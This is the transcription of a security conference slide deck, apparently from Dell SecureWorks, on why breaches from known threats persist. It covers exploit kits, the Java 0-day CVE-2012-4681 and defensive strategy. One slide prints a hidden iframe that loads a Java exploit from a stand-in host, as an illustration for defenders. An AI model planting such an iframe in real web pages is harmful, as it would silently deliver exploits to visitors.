Breaking the Cycle of Failure: Why breaches from known threats still happen.

Similar documents
Protecting organisations from the ever evolving Cyber Threat

INTRODUCING SOPHOS INTERCEPT X

Zero Trust in Healthcare Centrify Corporations. All Rights Reserved.

What can we lose not implementing proper security in our IT environment? Aleksandar Pavlovic Security Account Manager Cisco

SOLUTION BRIEF RSA NETWITNESS SUITE 3X THE IMPACT WITH YOUR EXISTING SECURITY TEAM

Leading in the compute era

Best Practices in Securing a Multicloud World

EU GENERAL DATA PROTECTION: TIME TO ACT. Laurent Vanderschrick Channel Manager Belgium & Luxembourg Stefaan Van Hoornick Technical Manager BeNeLux

RSA NetWitness Suite Respond in Minutes, Not Months

HOW CLOUD, MOBILITY AND SHIFTING APP ARCHITECTURES WILL TRANSFORM SECURITY: GAINING THE HOME-COURT ADVANTAGE

with Advanced Protection

Cloud Computing Private Cloud

EMC Storage Resource Management

Securing the Modern Data Center with Trend Micro Deep Security

Security Made Simple by Sophos

Reinvent Your 2013 Security Management Strategy

Ransomware & Modern DR: Risky Business

Build Your Zero Trust Security Strategy With Microsegmentation

Operationalizing the Three Principles of Advanced Threat Detection

RSA INCIDENT RESPONSE SERVICES

85% 89% 10/5/2018. Do You Have A Firewall Around Your Cloud? Conquering The Big Threats & Challenges

Kaspersky Cloud Security for Hybrid Cloud. Diego Magni Presales Manager Kaspersky Lab Italia

MaaS360 Unified Mobility Management

Threat Centric Vulnerability Management

Cyber Threat Intelligence Debbie Janeczek May 24, 2017

MOBILE SECURITY OVERVIEW. Tim LeMaster

How NSFOCUS Protected the G20 Summit. Guy Rosefelt on the Strategy, Staff and Tools Needed to Ensure Cybersecurity

Rethink Enterprise Endpoint Security In The Cloud Computing Era

STOPS CYBER ATTACKS BEFORE THEY STOP YOU. Prepare, recognize, and respond to today s attacks earlier with Verizon Security Solutions.

Changing The Conversation: Infrastructure as a Service

Welcome. Chris Sortzi, VP of Public Sector RightNow Technologies. March 19, RightNow Technologies, Inc.

The SANS Institute Top 20 Critical Security Controls. Compliance Guide

ISE North America Leadership Summit and Awards

Services solutions for Managed Service Providers (MSPs)

Virtustream and VMware Enable Mission-Critical Hybrid Cloud

IBM Security. Endpoint Manager- BigFix. Daniel Joksch Security Sales IBM Corporation

Session ID: CISO-W22 Session Classification: General Interest

Ta kontroll över er data! Christofer Jensen Client Technical Specialist. Stockholm

Department of Management Services REQUEST FOR INFORMATION

How To Build or Buy An Integrated Security Stack

Cloud Managed Services for Government (CMSG) A secure strategy for the Department of Defense at an IBM-operated, Level 5, DoD Facility

Avoiding an Information Security Mismanagement Program through Fundamentals. Bill Curtis, SynerComm

Mastering The Endpoint

HOSTED SECURITY SERVICES

THE EFFECTIVE APPROACH TO CYBER SECURITY VALIDATION BREACH & ATTACK SIMULATION

Journey to the Cloud. Jeff Hoehing, Principal Consultant

Future of Database. - Journey to the Cloud. Juan Loaiza Senior Vice President Oracle Database Systems

Building a Resilient Security Posture for Effective Breach Prevention

Vulnerability Management Trends In APAC

Teradata and Protegrity High-Value Protection for High-Value Data

FOR FINANCIAL SERVICES ORGANIZATIONS

Quantifying Cyber Security Risk in Dollars and Cents to Optimize Budgets

The Oracle Trust Fabric Securing the Cloud Journey

Understanding the Changing Cybersecurity Problem

Roadmap to the Efficient Cloud: 3 Checkpoints for the Modern Enterprise

Temenos Bringing banking to millions through Cloud Scale Innovation

Rethinking Information Security Risk Management CRM002

Think Like an Attacker

CYBER SECURITY AND MITIGATING RISKS

Florida Government Finance Officers Association. Staying Secure when Transforming to a Digital Government

Meeting PCI DSS 3.2 Compliance with RiskSense Solutions

Segment Your Network for Stronger Security

Technical Review Managing Risk, Complexity, and Cost with SanerNow Endpoint Security and Management Platform

OPEN SOURCE SECURITY ANALYSIS The State of Open Source Security in Commercial Applications

Cybersecurity for the SMB. CrowdStrike s Murphy on Steps to Improve Defenses on a Smaller Scale

UPGRADING OPENSTACK WITHOUT COMPLEXITY OR COMPROMISE

A Secure Foundation for Your Business. Lauren Duda - Product Marketing Manager March 13th, 2007

Red Hat Virtualization Increases Efficiency And Cost Effectiveness Of Virtualization

PAIN AND PROGRESS THE RSA CYBERSECURITY AND BUSINESS RISK STUDY

Commercial Product Matrix

SECURITY OPERATIONS CENTER BUY BUILD BUY. vs. Which Solution is Right for You?

Put an end to cyberthreats

Security Readiness Assessment

What makes a good KRI? Using FAIR to discover meaningful metrics

Vulnerability Assessment Process

ENTERPRISE ENDPOINT COMPARATIVE REPORT

Lessons Learned from 4,000 Security Assessments. Sadik Al-Abdulla Security Practice Director, CDW

9 Steps to Protect Against Ransomware

Traditional Security Solutions Have Reached Their Limit

Consolidation Committee Final Report

THALES DATA THREAT REPORT

Cybersecurity and Nonprofit

eguide: Designing a Continuous Response Architecture 5 Steps to Reduce the Complexity of PCI Security Assessments

Validating the Security of the Borderless Infrastructure

Privilege Security & Next-Generation Technology. Morey J. Haber Chief Technology Officer

7 Steps to Complete Privileged Account Management. September 5, 2017 Fabricio Simao Country Manager

Cyber Attack: Is Your Business at Risk?

The rise of major Adversaries is the most relevant trend in 2014, targeting Government and Critical Services

whitepaper How to Measure, Report On, and Actually Reduce Vulnerability Risk

Technical Overview. Elastic Path Commerce

PRODUCT OVERVIEW. On-demand threat investigation, root cause analysis and remediation advice without the need for extra internal resources

Cloud Customer Architecture for Securing Workloads on Cloud Services

Security Camp 2016 Cloud Security. August 18, 2016

July 20, 2006 Oracle Application Express Helps Build Web Applications Quickly by Noel Yuhanna with Megan Daniels

Enabling Fast IT. In the IoE era. Alberto Degradi DCV Sales Leader. November 2014

Are we breached? Deloitte's Cyber Threat Hunting

All the resources you need to get buy-in from your team and advocate for the tools you need.

Introduction Who needs WAF anyway? The Death of WAF? Advanced WAF Why F5?

CSP 2017 Network Virtualisation and Security Scott McKinnon

Tech Announcement 2018_1

Transcription:

Breaking the Cycle of Failure: Why breaches from known threats still happen. Don Smith Dell SecureWorks Session ID: STAR-207 Session Classification: Advanced

Security Domain Slide

Dell SecureWorks in numbers.. 70 3 800 28 000 000 000 7 300 000 000 000

Dell SecureWorks Operations Centers Edinburgh, Scotland Bucharest, Romania Chicago, IL Plano, TX Providence, RI Myrtle Beach, SC Atlanta, GA Noida, India Guadalajara, Mexico Hyderabad, India Security Operations Center (SOC) SOC and Data Center Partner SOC

Leading Provider of Information Security Services Gartner Magic Quadrant for MSSPs H2 2011 The Forrester Wave: Managed Security Services, North America, Q1 2012 The Magic Quadrant is copyrighted 28 November 2011 by Gartner, Inc. and is reused with permission. The Magic Quadrant is a graphical representation of a marketplace at and for a specific time period. It depicts Gartner s analysis of how certain vendors measure against criteria for that marketplace, as defined by Gartner. Gartner does not endorse any vendor, product or service depicted in the Magic Quadrant, and does not advise technology users to select only those vendors placed in the Leaders quadrant. The Magic Quadrant is intended solely as a research tool, and is not meant to be a specific guide to action. Gartner disclaims all warranties, express or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose. The Forrester Wave is copyrighted by Forrester Research, Inc. Forrester and Forrester Wave are trademarks of Forrester Research, Inc. The Forrester Wave is a graphical representation of Forrester's call on a market and is plotted using a detailed spreadsheet with exposed scores, weightings, and comments. Forrester does not endorse any vendor, product, or service depicted in the Forrester Wave. Information is based on best available resources. Opinions reflect judgment at the time and are subject to change.

Changing Context 6

Cloud SaaS IaaS Credit : Chuck Mortimore, SalesForce

Credit : Chuck Mortimore, SalesForce

Transparency 9 Confidential 10/10/2012

10 Confidential 10/10/2012 Transparency?

New Actors..

Grafitti Artists..

Financial Fraudsters, botmasters..

Hacktivists..

Journalists.

Intellectual Property Thieves

Nation State, Spooks..

The view from the SecureWorks SOC Bad Guys operating with impunity

Professionalism of the adversary

Blackhole Exploit Kit

Blackhole Exploit Kit

Java 0-day Vulnerability (CVE-2012-4681) Access violation vulnerability that allows an attacker to download and run arbitrary programs on the victim s computer Cross-platform Not mitigated by memory corruption protections (DEP, ASLR, etc.) Indicators show the vulnerability was likely used in targeted attacks preceding discovery Added to Metasploit Added to Blackhole Exploit Kit Malware IDS Indicators Vulnerability Goes Public

Exploit Java 0-day - CVE-2012-4681 <iframe src="http://192.168.1.87:8080/javaexploit" allowtransparency="true" height=0 width=0 scrolling="no" marginwidth="0" marginheight="0" frameborder="0"></iframe>

Link To Nitro Attacks 0-day Domain Shared IP Address Nitro Attacks Nitro Domain Malware IDS Indicators Vulnerability Goes Public

Java & IE 0-day thoughts Targeted: Same threat actors using both vulns IE 0-day appears once Java is patched Linked to previous APT campaigns Likely used for months prior to disclosure Commodity: Metasploit modules created in 24 hours Commercial exploit kits updated in 24 hours

Be pragmatic The bad guys move quickly 26

I know that half my marketing budget is wasted but I don t know which half.

Simplify IT is too complicated Business Demands on IT Unnecessar y ISOLATE Unavoidable Standardise Consolidate Rationalise Automate Automate Run in Cloud Tactical & Non- Discretionary Strategic Invest $$$

Re-imagine IT Post-Modern Business Simplicity Creative Destruction

Where s your data?

Classify your data be pragmatic

Good Enough..?

37 Confidential

Standards

Change and Configuration Management

Embrace Strategic Change

Compliance You don t fatten a pig by weighing it

Compliance - Effectiveness of technical controls

User Education

Protect users from themselves

Oversecure?

47

New Security Initiatives

New Vocabulary for Security 49

How to express policy in 2012? Traditional firewalls define policy in terms of which network locations can access other locations Security professionals need to start thinking about controls at different layers of the technology stack. Who can access what, not which subnet can access which other subnet

Identity Bridges Providing the glue for enterprise in the 21 st Century

This is how the industry describes it

This is how the user sees it

This is delivered to the security team

Tokens not sessions

56 On Breaking SAML: Be Whoever You Want to Be Juraj Somorovsky, Andreas Mayer, Jörg Schwenk, Marco Kampmann, and Meiko Jensen

Credit : Chuck Mortimore, SalesForce

GONE!!

A glimpse of the future 59

Three Key Things 60

61 Confidential

62 Confidential

63 Confidential

Takeaways from this session In the next three months: Ask if your current projects will really deliver What s unnecessary, what s necessary, unavoidable tactical/strategic? Technology Think twice before investing, are the supporting processes there? Identify Critical Data Assets Talk to your business what are they scared about losing? Align protective and detective controls to your data assets Practise good enough security Within six months you should: Implement root & branch user education program Define new security roadmap: people, process & technology

Practical advice UKenquiry@secureworks.com

Thanks donsmith@secureworks.com 66

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback